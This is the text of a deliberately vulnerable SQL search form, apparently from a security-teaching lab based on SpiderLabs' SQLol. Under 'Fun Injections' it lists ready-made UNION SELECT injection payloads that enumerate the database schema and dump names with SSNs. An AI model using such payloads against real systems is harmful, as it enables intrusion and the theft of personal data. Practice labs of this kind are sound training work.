Vulnerable SQL Query Form

Find Users

Name:

Search Tips

% is a wildcard character

To find all names starting with C, search for C%

To see all names, search for %

A name containing an apostrophe will cause an error, like O'Neil

Fun Injections

Database Names

' UNION SELECT table_schema AS username FROM information_schema.tables WHERE 'a'='a

Tables in sqlol Database

' UNION SELECT table_name AS username FROM information_schema.tables WHERE table_schema='sqlol

Columns within ssl Table

' UNION SELECT column_name AS username FROM information_schema.columns WHERE table_name='ssn' AND table_schema='sqlol

Dump SSNs

' UNION SELECT concat(name, ':', ssn) AS username FROM sqlol.ssn WHERE 'a'='a

Click here to reset the database

Click here to execute raw SQL queries

Click here for a less vulnerable site

Click here for the original SQLol challenges

Source

Based on SQLol from SpiderLabs.


Last revised 1-11-16 by Sam Bowne